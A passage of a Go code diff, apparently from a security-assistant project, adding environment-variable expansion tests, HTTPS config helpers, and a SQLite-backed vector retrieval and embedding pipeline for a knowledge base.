{"empty string", "", ""},
|
||||
{"simple var", "${TEST_MCP_VAR}", "hello"},
|
||||
{"var in middle", "prefix-${TEST_MCP_VAR}-suffix", "prefix-hello-suffix"},
|
||||
{"multiple vars", "${TEST_MCP_PATH}/${TEST_MCP_VAR}", "/usr/local/bin/hello"},
|
||||
{"missing var empty", "${NONEXISTENT_MCP_VAR_XYZ}", ""},
|
||||
{"default value used", "${NONEXISTENT_MCP_VAR_XYZ:-fallback}", "fallback"},
|
||||
{"default not used", "${TEST_MCP_VAR:-unused}", "hello"},
|
||||
{"default with path", "${NONEXISTENT_MCP_VAR_XYZ:-/tmp/default}", "/tmp/default"},
|
||||
{"unclosed brace", "${UNCLOSED", "${UNCLOSED"},
|
||||
{"dollar without brace", "$PLAIN", "$PLAIN"},
|
||||
{"empty var name", "${}", ""},
|
||||
{"default empty var", "${:-default}", "default"},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
got := expandEnvVar(tt.input)
|
||||
if got != tt.expect {
|
||||
t.Errorf("expandEnvVar(%q) = %q, want %q", tt.input, got, tt.expect)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestExpandConfigEnv(t *testing.T) {
|
||||
os.Setenv("TEST_MCP_CMD", "python3")
|
||||
os.Setenv("TEST_MCP_TOKEN", "secret123")
|
||||
defer os.Unsetenv("TEST_MCP_CMD")
|
||||
defer os.Unsetenv("TEST_MCP_TOKEN")
|
||||
|
||||
cfg := &ExternalMCPServerConfig{
|
||||
Command: "${TEST_MCP_CMD}",
|
||||
Args: []string{"--token", "${TEST_MCP_TOKEN}", "${MISSING:-default_arg}"},
|
||||
Env: map[string]string{"API_KEY": "${TEST_MCP_TOKEN}", "LEVEL": "${MISSING:-INFO}"},
|
||||
URL: "https://${MISSING:-example.com}/mcp",
|
||||
Headers: map[string]string{"Authorization": "Bearer ${TEST_MCP_TOKEN}"},
|
||||
}
|
||||
|
||||
ExpandConfigEnv(cfg)
|
||||
|
||||
if cfg.Command != "python3" {
|
||||
t.Errorf("Command = %q, want %q", cfg.Command, "python3")
|
||||
}
|
||||
if cfg.Args[1] != "secret123" {
|
||||
t.Errorf("Args[1] = %q, want %q", cfg.Args[1], "secret123")
|
||||
}
|
||||
if cfg.Args[2] != "default_arg" {
|
||||
t.Errorf("Args[2] = %q, want %q", cfg.Args[2], "default_arg")
|
||||
}
|
||||
if cfg.Env["API_KEY"] != "secret123" {
|
||||
t.Errorf("Env[API_KEY] = %q, want %q", cfg.Env["API_KEY"], "secret123")
|
||||
}
|
||||
if cfg.Env["LEVEL"] != "INFO" {
|
||||
t.Errorf("Env[LEVEL] = %q, want %q", cfg.Env["LEVEL"], "INFO")
|
||||
}
|
||||
if cfg.URL != "https://example.com/mcp" {
|
||||
t.Errorf("URL = %q, want %q", cfg.URL, "https://example.com/mcp")
|
||||
}
|
||||
if cfg.Headers["Authorization"] != "Bearer secret123" {
|
||||
t.Errorf("Headers[Authorization] = %q, want %q", cfg.Headers["Authorization"], "Bearer secret123")
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,46 @@
|
||||
package config
|
||||
|
||||
import "strings"
|
||||
|
||||
// MainWebUIUsesHTTPS 判断主 Web UI 是否以 HTTPS 监听(与 internal/app.prepareMainServerTLS 前置条件一致)。
|
||||
func MainWebUIUsesHTTPS(s *ServerConfig) bool {
|
||||
if s == nil {
|
||||
return false
|
||||
}
|
||||
if s.TLSEnabled {
|
||||
return true
|
||||
}
|
||||
if s.TLSAutoSelfSign {
|
||||
return true
|
||||
}
|
||||
cert := strings.TrimSpace(s.TLSCertPath)
|
||||
key := strings.TrimSpace(s.TLSKeyPath)
|
||||
return cert != "" && key != ""
|
||||
}
|
||||
|
||||
// ServerHTTPRedirectEnabled 是否在主站启用 HTTPS 时把明文 HTTP 请求重定向到 HTTPS(默认开启)。
|
||||
func ServerHTTPRedirectEnabled(s *ServerConfig) bool {
|
||||
if s == nil || !MainWebUIUsesHTTPS(s) {
|
||||
return false
|
||||
}
|
||||
if s.TLSHTTPRedirect == nil {
|
||||
return true
|
||||
}
|
||||
return *s.TLSHTTPRedirect
|
||||
}
|
||||
|
||||
// ApplyDevHTTPSBootstrap 供 --https / 一键脚本使用:强制开启主站 TLS。
|
||||
// 若已配置 tls_cert_path 与 tls_key_path 则仅用 PEM,不开启自签;否则启用 tls_auto_self_sign(内存证书,仅本地测试)。
|
||||
func ApplyDevHTTPSBootstrap(cfg *Config) {
|
||||
if cfg == nil {
|
||||
return
|
||||
}
|
||||
cfg.Server.TLSEnabled = true
|
||||
cert := strings.TrimSpace(cfg.Server.TLSCertPath)
|
||||
key := strings.TrimSpace(cfg.Server.TLSKeyPath)
|
||||
if cert != "" && key != "" {
|
||||
cfg.Server.TLSAutoSelfSign = false
|
||||
return
|
||||
}
|
||||
cfg.Server.TLSAutoSelfSign = true
|
||||
}
|
||||
@@ -0,0 +1,67 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"strings"
|
||||
|
||||
"github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown"
|
||||
"github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive"
|
||||
"github.com/cloudwego/eino/components/document"
|
||||
"github.com/pkoukk/tiktoken-go"
|
||||
)
|
||||
|
||||
func tokenizerLenFunc(embeddingModel string) func(string) int {
|
||||
fallback := func(s string) int {
|
||||
r := []rune(s)
|
||||
if len(r) == 0 {
|
||||
return 0
|
||||
}
|
||||
return (len(r) + 3) / 4
|
||||
}
|
||||
m := strings.TrimSpace(embeddingModel)
|
||||
if m == "" {
|
||||
return fallback
|
||||
}
|
||||
tok, err := tiktoken.EncodingForModel(m)
|
||||
if err != nil {
|
||||
return fallback
|
||||
}
|
||||
return func(s string) int {
|
||||
return len(tok.Encode(s, nil, nil))
|
||||
}
|
||||
}
|
||||
|
||||
// newKnowledgeSplitter builds an Eino recursive text splitter. LenFunc uses tiktoken for
|
||||
// embeddingModel when available, else rune/4 approximation.
|
||||
func newKnowledgeSplitter(chunkSize, overlap int, embeddingModel string) (document.Transformer, error) {
|
||||
if chunkSize <= 0 {
|
||||
return nil, fmt.Errorf("chunk size must be positive")
|
||||
}
|
||||
if overlap < 0 {
|
||||
overlap = 0
|
||||
}
|
||||
return recursive.NewSplitter(context.Background(), &recursive.Config{
|
||||
ChunkSize: chunkSize,
|
||||
OverlapSize: overlap,
|
||||
LenFunc: tokenizerLenFunc(embeddingModel),
|
||||
Separators: []string{
|
||||
"\n\n", "\n## ", "\n### ", "\n#### ", "\n",
|
||||
"。", "!", "?", ". ", "? ", "! ",
|
||||
" ",
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
// newMarkdownHeaderSplitter Eino-ext Markdown 按标题切分(#~####),适合技术/Markdown 知识库。
|
||||
func newMarkdownHeaderSplitter(ctx context.Context) (document.Transformer, error) {
|
||||
return markdown.NewHeaderSplitter(ctx, &markdown.HeaderConfig{
|
||||
Headers: map[string]string{
|
||||
"#": "h1",
|
||||
"##": "h2",
|
||||
"###": "h3",
|
||||
"####": "h4",
|
||||
},
|
||||
TrimHeaders: false,
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,129 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// Document metadata keys for Eino schema.Document flowing through the RAG pipeline.
|
||||
const (
|
||||
metaKBCategory = "kb_category"
|
||||
metaKBTitle = "kb_title"
|
||||
metaKBItemID = "kb_item_id"
|
||||
metaKBChunkIndex = "kb_chunk_index"
|
||||
metaSimilarity = "similarity"
|
||||
)
|
||||
|
||||
// DSL keys for [VectorEinoRetriever.Retrieve] via [retriever.WithDSLInfo].
|
||||
const (
|
||||
DSLRiskType = "risk_type"
|
||||
DSLSimilarityThreshold = "similarity_threshold"
|
||||
DSLSubIndexFilter = "sub_index_filter"
|
||||
)
|
||||
|
||||
// FormatEmbeddingInput matches the historical indexing format so existing embeddings
|
||||
// stay comparable if users skip reindex; new indexes use the same string shape.
|
||||
func FormatEmbeddingInput(category, title, chunkText string) string {
|
||||
return fmt.Sprintf("[风险类型:%s] [标题:%s]\n%s", category, title, chunkText)
|
||||
}
|
||||
|
||||
// FormatQueryEmbeddingText builds the string embedded at query time so it matches
|
||||
// [FormatEmbeddingInput] for the same risk category (title left empty for queries).
|
||||
func FormatQueryEmbeddingText(riskType, query string) string {
|
||||
q := strings.TrimSpace(query)
|
||||
rt := strings.TrimSpace(riskType)
|
||||
if rt != "" {
|
||||
return FormatEmbeddingInput(rt, "", q)
|
||||
}
|
||||
return q
|
||||
}
|
||||
|
||||
// MetaLookupString returns metadata string value or "" if absent.
|
||||
func MetaLookupString(md map[string]any, key string) string {
|
||||
if md == nil {
|
||||
return ""
|
||||
}
|
||||
v, ok := md[key]
|
||||
if !ok || v == nil {
|
||||
return ""
|
||||
}
|
||||
switch t := v.(type) {
|
||||
case string:
|
||||
return t
|
||||
default:
|
||||
return strings.TrimSpace(fmt.Sprint(t))
|
||||
}
|
||||
}
|
||||
|
||||
// MetaStringOK returns trimmed non-empty string and true if present and non-empty.
|
||||
func MetaStringOK(md map[string]any, key string) (string, bool) {
|
||||
s := strings.TrimSpace(MetaLookupString(md, key))
|
||||
if s == "" {
|
||||
return "", false
|
||||
}
|
||||
return s, true
|
||||
}
|
||||
|
||||
// RequireMetaString requires a non-empty string metadata field.
|
||||
func RequireMetaString(md map[string]any, key string) (string, error) {
|
||||
s, ok := MetaStringOK(md, key)
|
||||
if !ok {
|
||||
return "", fmt.Errorf("missing or empty metadata %q", key)
|
||||
}
|
||||
return s, nil
|
||||
}
|
||||
|
||||
// RequireMetaInt requires an integer metadata field.
|
||||
func RequireMetaInt(md map[string]any, key string) (int, error) {
|
||||
if md == nil {
|
||||
return 0, fmt.Errorf("missing metadata key %q", key)
|
||||
}
|
||||
v, ok := md[key]
|
||||
if !ok {
|
||||
return 0, fmt.Errorf("missing metadata key %q", key)
|
||||
}
|
||||
switch t := v.(type) {
|
||||
case int:
|
||||
return t, nil
|
||||
case int32:
|
||||
return int(t), nil
|
||||
case int64:
|
||||
return int(t), nil
|
||||
case float64:
|
||||
return int(t), nil
|
||||
default:
|
||||
return 0, fmt.Errorf("metadata %q: unsupported type %T", key, v)
|
||||
}
|
||||
}
|
||||
|
||||
// DSLNumeric coerces DSL map values (e.g. from JSON) to float64.
|
||||
func DSLNumeric(v any) (float64, bool) {
|
||||
switch t := v.(type) {
|
||||
case float64:
|
||||
return t, true
|
||||
case float32:
|
||||
return float64(t), true
|
||||
case int:
|
||||
return float64(t), true
|
||||
case int64:
|
||||
return float64(t), true
|
||||
case uint32:
|
||||
return float64(t), true
|
||||
case uint64:
|
||||
return float64(t), true
|
||||
default:
|
||||
return 0, false
|
||||
}
|
||||
}
|
||||
|
||||
// MetaFloat64OK reads a float metadata value.
|
||||
func MetaFloat64OK(md map[string]any, key string) (float64, bool) {
|
||||
if md == nil {
|
||||
return 0, false
|
||||
}
|
||||
v, ok := md[key]
|
||||
if !ok {
|
||||
return 0, false
|
||||
}
|
||||
return DSLNumeric(v)
|
||||
}
|
||||
@@ -0,0 +1,14 @@
|
||||
package knowledge
|
||||
|
||||
import "testing"
|
||||
|
||||
func TestFormatQueryEmbeddingText_AlignsWithIndexPrefix(t *testing.T) {
|
||||
q := FormatQueryEmbeddingText("XSS", "payload")
|
||||
want := FormatEmbeddingInput("XSS", "", "payload")
|
||||
if q != want {
|
||||
t.Fatalf("query embed text mismatch:\n got: %q\nwant: %q", q, want)
|
||||
}
|
||||
if FormatQueryEmbeddingText("", "hello") != "hello" {
|
||||
t.Fatalf("expected bare query without risk type")
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,25 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
|
||||
"github.com/cloudwego/eino/compose"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
// BuildKnowledgeRetrieveChain 编译「查询字符串 → 文档列表」的 Eino Chain,底层为 SQLite 向量检索([VectorEinoRetriever])。
|
||||
// 去重、上下文预算截断与最终 Top-K 均在 [VectorEinoRetriever.Retrieve] 内完成,与 HTTP/MCP 检索路径一致。
|
||||
func BuildKnowledgeRetrieveChain(ctx context.Context, r *Retriever) (compose.Runnable[string, []*schema.Document], error) {
|
||||
if r == nil {
|
||||
return nil, fmt.Errorf("retriever is nil")
|
||||
}
|
||||
ch := compose.NewChain[string, []*schema.Document]()
|
||||
ch.AppendRetriever(r.AsEinoRetriever())
|
||||
return ch.Compile(ctx)
|
||||
}
|
||||
|
||||
// CompileRetrieveChain 等价于 [BuildKnowledgeRetrieveChain](ctx, r)。
|
||||
func (r *Retriever) CompileRetrieveChain(ctx context.Context) (compose.Runnable[string, []*schema.Document], error) {
|
||||
return BuildKnowledgeRetrieveChain(ctx, r)
|
||||
}
|
||||
@@ -0,0 +1,23 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"testing"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
func TestBuildKnowledgeRetrieveChain_Compile(t *testing.T) {
|
||||
r := NewRetriever(nil, nil, &RetrievalConfig{TopK: 3, SimilarityThreshold: 0.5}, zap.NewNop())
|
||||
_, err := BuildKnowledgeRetrieveChain(context.Background(), r)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildKnowledgeRetrieveChain_NilRetriever(t *testing.T) {
|
||||
_, err := BuildKnowledgeRetrieveChain(context.Background(), nil)
|
||||
if err == nil {
|
||||
t.Fatal("expected error for nil retriever")
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,202 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/cloudwego/eino/callbacks"
|
||||
"github.com/cloudwego/eino/components"
|
||||
"github.com/cloudwego/eino/components/retriever"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// VectorEinoRetriever implements [retriever.Retriever] on top of SQLite-stored embeddings + cosine similarity.
|
||||
//
|
||||
// Options:
|
||||
// - [retriever.WithTopK]
|
||||
// - [retriever.WithDSLInfo] with [DSLRiskType] (string), [DSLSimilarityThreshold] (float, cosine 0–1), [DSLSubIndexFilter] (string)
|
||||
//
|
||||
// Document scores are cosine similarity; [retriever.WithScoreThreshold] is not mapped to a different metric.
|
||||
//
|
||||
// After vector search: optional [DocumentReranker] (see [Retriever.SetDocumentReranker]), then
|
||||
// [ApplyPostRetrieve] (normalized-text dedupe, context budget, final Top-K) using [config.PostRetrieveConfig].
|
||||
type VectorEinoRetriever struct {
|
||||
inner *Retriever
|
||||
}
|
||||
|
||||
// NewVectorEinoRetriever wraps r for Eino compose / tooling.
|
||||
func NewVectorEinoRetriever(r *Retriever) *VectorEinoRetriever {
|
||||
if r == nil {
|
||||
return nil
|
||||
}
|
||||
return &VectorEinoRetriever{inner: r}
|
||||
}
|
||||
|
||||
// GetType identifies this retriever for Eino callbacks.
|
||||
func (h *VectorEinoRetriever) GetType() string {
|
||||
return "SQLiteVectorKnowledgeRetriever"
|
||||
}
|
||||
|
||||
// Retrieve runs vector search and returns [schema.Document] rows.
|
||||
func (h *VectorEinoRetriever) Retrieve(ctx context.Context, query string, opts ...retriever.Option) (out []*schema.Document, err error) {
|
||||
if h == nil || h.inner == nil {
|
||||
return nil, fmt.Errorf("VectorEinoRetriever: nil retriever")
|
||||
}
|
||||
q := strings.TrimSpace(query)
|
||||
if q == "" {
|
||||
return nil, fmt.Errorf("查询不能为空")
|
||||
}
|
||||
|
||||
ro := retriever.GetCommonOptions(nil, opts...)
|
||||
cfg := h.inner.config
|
||||
|
||||
req := &SearchRequest{Query: q}
|
||||
|
||||
if ro.TopK != nil && *ro.TopK > 0 {
|
||||
req.TopK = *ro.TopK
|
||||
} else if cfg != nil && cfg.TopK > 0 {
|
||||
req.TopK = cfg.TopK
|
||||
} else {
|
||||
req.TopK = 5
|
||||
}
|
||||
|
||||
req.Threshold = 0
|
||||
if ro.DSLInfo != nil {
|
||||
if rt, ok := ro.DSLInfo[DSLRiskType].(string); ok {
|
||||
req.RiskType = strings.TrimSpace(rt)
|
||||
}
|
||||
if v, ok := ro.DSLInfo[DSLSimilarityThreshold]; ok {
|
||||
if f, ok2 := DSLNumeric(v); ok2 && f > 0 {
|
||||
req.Threshold = f
|
||||
}
|
||||
}
|
||||
if sf, ok := ro.DSLInfo[DSLSubIndexFilter].(string); ok {
|
||||
req.SubIndexFilter = strings.TrimSpace(sf)
|
||||
}
|
||||
}
|
||||
if req.SubIndexFilter == "" && cfg != nil && strings.TrimSpace(cfg.SubIndexFilter) != "" {
|
||||
req.SubIndexFilter = strings.TrimSpace(cfg.SubIndexFilter)
|
||||
}
|
||||
if req.Threshold <= 0 && cfg != nil && cfg.SimilarityThreshold > 0 {
|
||||
req.Threshold = cfg.SimilarityThreshold
|
||||
}
|
||||
if req.Threshold <= 0 {
|
||||
req.Threshold = 0.7
|
||||
}
|
||||
|
||||
finalTopK := req.TopK
|
||||
var postPO *config.PostRetrieveConfig
|
||||
if cfg != nil {
|
||||
postPO = &cfg.PostRetrieve
|
||||
}
|
||||
fetchK := EffectivePrefetchTopK(finalTopK, postPO)
|
||||
searchReq := *req
|
||||
searchReq.TopK = fetchK
|
||||
|
||||
ctx = callbacks.EnsureRunInfo(ctx, h.GetType(), components.ComponentOfRetriever)
|
||||
th := req.Threshold
|
||||
st := &th
|
||||
ctx = callbacks.OnStart(ctx, &retriever.CallbackInput{
|
||||
Query: q,
|
||||
TopK: finalTopK,
|
||||
ScoreThreshold: st,
|
||||
Extra: ro.DSLInfo,
|
||||
})
|
||||
defer func() {
|
||||
if err != nil {
|
||||
_ = callbacks.OnError(ctx, err)
|
||||
return
|
||||
}
|
||||
_ = callbacks.OnEnd(ctx, &retriever.CallbackOutput{Docs: out})
|
||||
}()
|
||||
|
||||
results, err := h.inner.vectorSearch(ctx, &searchReq)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
out = retrievalResultsToDocuments(results)
|
||||
|
||||
if rr := h.inner.documentReranker(); rr != nil && len(out) > 1 {
|
||||
reranked, rerr := rr.Rerank(ctx, q, out)
|
||||
if rerr != nil {
|
||||
if h.inner.logger != nil {
|
||||
h.inner.logger.Warn("知识检索重排失败,已使用向量序", zap.Error(rerr))
|
||||
}
|
||||
} else if len(reranked) > 0 {
|
||||
out = reranked
|
||||
}
|
||||
}
|
||||
|
||||
tokenModel := ""
|
||||
if h.inner.embedder != nil {
|
||||
tokenModel = h.inner.embedder.EmbeddingModelName()
|
||||
}
|
||||
out, err = ApplyPostRetrieve(out, postPO, tokenModel, finalTopK)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return out, nil
|
||||
}
|
||||
|
||||
func retrievalResultsToDocuments(results []*RetrievalResult) []*schema.Document {
|
||||
out := make([]*schema.Document, 0, len(results))
|
||||
for _, res := range results {
|
||||
if res == nil || res.Chunk == nil || res.Item == nil {
|
||||
continue
|
||||
}
|
||||
d := &schema.Document{
|
||||
ID: res.Chunk.ID,
|
||||
Content: res.Chunk.ChunkText,
|
||||
MetaData: map[string]any{
|
||||
metaKBItemID: res.Item.ID,
|
||||
metaKBCategory: res.Item.Category,
|
||||
metaKBTitle: res.Item.Title,
|
||||
metaKBChunkIndex: res.Chunk.ChunkIndex,
|
||||
metaSimilarity: res.Similarity,
|
||||
},
|
||||
}
|
||||
d.WithScore(res.Score)
|
||||
out = append(out, d)
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
func documentsToRetrievalResults(docs []*schema.Document) ([]*RetrievalResult, error) {
|
||||
out := make([]*RetrievalResult, 0, len(docs))
|
||||
for i, d := range docs {
|
||||
if d == nil {
|
||||
continue
|
||||
}
|
||||
itemID, err := RequireMetaString(d.MetaData, metaKBItemID)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("document %d: %w", i, err)
|
||||
}
|
||||
cat := MetaLookupString(d.MetaData, metaKBCategory)
|
||||
title := MetaLookupString(d.MetaData, metaKBTitle)
|
||||
chunkIdx, err := RequireMetaInt(d.MetaData, metaKBChunkIndex)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("document %d: %w", i, err)
|
||||
}
|
||||
sim, _ := MetaFloat64OK(d.MetaData, metaSimilarity)
|
||||
item := &KnowledgeItem{ID: itemID, Category: cat, Title: title}
|
||||
chunk := &KnowledgeChunk{
|
||||
ID: d.ID,
|
||||
ItemID: itemID,
|
||||
ChunkIndex: chunkIdx,
|
||||
ChunkText: d.Content,
|
||||
}
|
||||
out = append(out, &RetrievalResult{
|
||||
Chunk: chunk,
|
||||
Item: item,
|
||||
Similarity: sim,
|
||||
Score: d.Score(),
|
||||
})
|
||||
}
|
||||
return out, nil
|
||||
}
|
||||
|
||||
var _ retriever.Retriever = (*VectorEinoRetriever)(nil)
|
||||
@@ -0,0 +1,142 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"database/sql"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"strings"
|
||||
|
||||
"github.com/cloudwego/eino/callbacks"
|
||||
"github.com/cloudwego/eino/components"
|
||||
"github.com/cloudwego/eino/components/indexer"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
"github.com/google/uuid"
|
||||
)
|
||||
|
||||
// SQLiteIndexer implements [indexer.Indexer] against knowledge_embeddings + existing schema.
|
||||
type SQLiteIndexer struct {
|
||||
db *sql.DB
|
||||
batchSize int
|
||||
embeddingModel string
|
||||
}
|
||||
|
||||
// NewSQLiteIndexer returns an indexer that writes chunk rows for one knowledge item per Store call.
|
||||
// batchSize is the embedding batch size; if <= 0, default 64 is used.
|
||||
// embeddingModel is persisted per row for retrieval-time consistency checks (may be empty).
|
||||
func NewSQLiteIndexer(db *sql.DB, batchSize int, embeddingModel string) *SQLiteIndexer {
|
||||
return &SQLiteIndexer{db: db, batchSize: batchSize, embeddingModel: strings.TrimSpace(embeddingModel)}
|
||||
}
|
||||
|
||||
// GetType implements eino callback run info.
|
||||
func (s *SQLiteIndexer) GetType() string {
|
||||
return "SQLiteKnowledgeIndexer"
|
||||
}
|
||||
|
||||
// Store embeds documents and inserts rows. Each doc must carry MetaData:
|
||||
// kb_item_id, kb_category, kb_title, kb_chunk_index (int). Content is chunk text only.
|
||||
func (s *SQLiteIndexer) Store(ctx context.Context, docs []*schema.Document, opts ...indexer.Option) (ids []string, err error) {
|
||||
options := indexer.GetCommonOptions(nil, opts...)
|
||||
if options.Embedding == nil {
|
||||
return nil, fmt.Errorf("sqlite indexer: embedding is required")
|
||||
}
|
||||
if len(docs) == 0 {
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
ctx = callbacks.EnsureRunInfo(ctx, s.GetType(), components.ComponentOfIndexer)
|
||||
ctx = callbacks.OnStart(ctx, &indexer.CallbackInput{Docs: docs})
|
||||
defer func() {
|
||||
if err != nil {
|
||||
_ = callbacks.OnError(ctx, err)
|
||||
return
|
||||
}
|
||||
_ = callbacks.OnEnd(ctx, &indexer.CallbackOutput{IDs: ids})
|
||||
}()
|
||||
|
||||
subIdxStr := strings.Join(options.SubIndexes, ",")
|
||||
|
||||
texts := make([]string, len(docs))
|
||||
for i, d := range docs {
|
||||
if d == nil {
|
||||
return nil, fmt.Errorf("sqlite indexer: nil document at %d", i)
|
||||
}
|
||||
cat := MetaLookupString(d.MetaData, metaKBCategory)
|
||||
title := MetaLookupString(d.MetaData, metaKBTitle)
|
||||
texts[i] = FormatEmbeddingInput(cat, title, d.Content)
|
||||
}
|
||||
|
||||
bs := s.batchSize
|
||||
if bs <= 0 {
|
||||
bs = 64
|
||||
}
|
||||
|
||||
var allVecs [][]float64
|
||||
for start := 0; start < len(texts); start += bs {
|
||||
end := start + bs
|
||||
if end > len(texts) {
|
||||
end = len(texts)
|
||||
}
|
||||
batch := texts[start:end]
|
||||
vecs, embedErr := options.Embedding.EmbedStrings(ctx, batch)
|
||||
if embedErr != nil {
|
||||
return nil, fmt.Errorf("sqlite indexer: embed batch %d-%d: %w", start, end, embedErr)
|
||||
}
|
||||
if len(vecs) != len(batch) {
|
||||
return nil, fmt.Errorf("sqlite indexer: embed count mismatch: got %d want %d", len(vecs), len(batch))
|
||||
}
|
||||
allVecs = append(allVecs, vecs...)
|
||||
}
|
||||
|
||||
embedDim := 0
|
||||
if len(allVecs) > 0 {
|
||||
embedDim = len(allVecs[0])
|
||||
}
|
||||
|
||||
tx, err := s.db.BeginTx(ctx, nil)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("sqlite indexer: begin tx: %w", err)
|
||||
}
|
||||
defer tx.Rollback()
|
||||
|
||||
ids = make([]string, 0, len(docs))
|
||||
for i, d := range docs {
|
||||
chunkID := uuid.New().String()
|
||||
itemID, metaErr := RequireMetaString(d.MetaData, metaKBItemID)
|
||||
if metaErr != nil {
|
||||
return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr)
|
||||
}
|
||||
chunkIdx, metaErr := RequireMetaInt(d.MetaData, metaKBChunkIndex)
|
||||
if metaErr != nil {
|
||||
return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr)
|
||||
}
|
||||
vec := allVecs[i]
|
||||
if embedDim > 0 && len(vec) != embedDim {
|
||||
return nil, fmt.Errorf("sqlite indexer: inconsistent embedding dim at doc %d: got %d want %d", i, len(vec), embedDim)
|
||||
}
|
||||
vec32 := make([]float32, len(vec))
|
||||
for j, v := range vec {
|
||||
vec32[j] = float32(v)
|
||||
}
|
||||
embeddingJSON, jsonErr := json.Marshal(vec32)
|
||||
if jsonErr != nil {
|
||||
return nil, fmt.Errorf("sqlite indexer: marshal embedding: %w", jsonErr)
|
||||
}
|
||||
_, err = tx.ExecContext(ctx,
|
||||
`INSERT INTO knowledge_embeddings (id, item_id, chunk_index, chunk_text, embedding, sub_indexes, embedding_model, embedding_dim, created_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?, ?, ?, datetime('now'))`,
|
||||
chunkID, itemID, chunkIdx, d.Content, string(embeddingJSON), subIdxStr, s.embeddingModel, embedDim,
|
||||
)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("sqlite indexer: insert chunk %d: %w", i, err)
|
||||
}
|
||||
ids = append(ids, chunkID)
|
||||
}
|
||||
|
||||
if err := tx.Commit(); err != nil {
|
||||
return nil, fmt.Errorf("sqlite indexer: commit: %w", err)
|
||||
}
|
||||
return ids, nil
|
||||
}
|
||||
|
||||
var _ indexer.Indexer = (*SQLiteIndexer)(nil)
|
||||
@@ -0,0 +1,251 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
einoembedopenai "github.com/cloudwego/eino-ext/components/embedding/openai"
|
||||
"github.com/cloudwego/eino/components/embedding"
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/time/rate"
|
||||
)
|
||||
|
||||
// Embedder 使用 CloudWeGo Eino 的 OpenAI Embedding 组件,并保留速率限制与重试。
|
||||
type Embedder struct {
|
||||
eino embedding.Embedder
|
||||
config *config.KnowledgeConfig
|
||||
logger *zap.Logger
|
||||
|
||||
rateLimiter *rate.Limiter
|
||||
rateLimitDelay time.Duration
|
||||
maxRetries int
|
||||
retryDelay time.Duration
|
||||
mu sync.Mutex
|
||||
}
|
||||
|
||||
// NewEmbedder 基于 Eino eino-ext OpenAI Embedder;openAIConfig 用于在知识库未单独配置 key 时回退 API Key。
|
||||
func NewEmbedder(ctx context.Context, cfg *config.KnowledgeConfig, openAIConfig *config.OpenAIConfig, logger *zap.Logger) (*Embedder, error) {
|
||||
if cfg == nil {
|
||||
return nil, fmt.Errorf("knowledge config is nil")
|
||||
}
|
||||
|
||||
var rateLimiter *rate.Limiter
|
||||
var rateLimitDelay time.Duration
|
||||
if cfg.Indexing.MaxRPM > 0 {
|
||||
rpm := cfg.Indexing.MaxRPM
|
||||
rateLimiter = rate.NewLimiter(rate.Every(time.Minute/time.Duration(rpm)), rpm)
|
||||
if logger != nil {
|
||||
logger.Info("知识库索引速率限制已启用", zap.Int("maxRPM", rpm))
|
||||
}
|
||||
} else if cfg.Indexing.RateLimitDelayMs > 0 {
|
||||
rateLimitDelay = time.Duration(cfg.Indexing.RateLimitDelayMs) * time.Millisecond
|
||||
if logger != nil {
|
||||
logger.Info("知识库索引固定延迟已启用", zap.Duration("delay", rateLimitDelay))
|
||||
}
|
||||
}
|
||||
|
||||
maxRetries := 3
|
||||
retryDelay := 1000 * time.Millisecond
|
||||
if cfg.Indexing.MaxRetries > 0 {
|
||||
maxRetries = cfg.Indexing.MaxRetries
|
||||
}
|
||||
if cfg.Indexing.RetryDelayMs > 0 {
|
||||
retryDelay = time.Duration(cfg.Indexing.RetryDelayMs) * time.Millisecond
|
||||
}
|
||||
|
||||
model := strings.TrimSpace(cfg.Embedding.Model)
|
||||
if model == "" {
|
||||
model = "text-embedding-3-small"
|
||||
}
|
||||
|
||||
baseURL := strings.TrimSpace(cfg.Embedding.BaseURL)
|
||||
baseURL = strings.TrimSuffix(baseURL, "/")
|
||||
if baseURL == "" {
|
||||
baseURL = "https://api.openai.com/v1"
|
||||
}
|
||||
|
||||
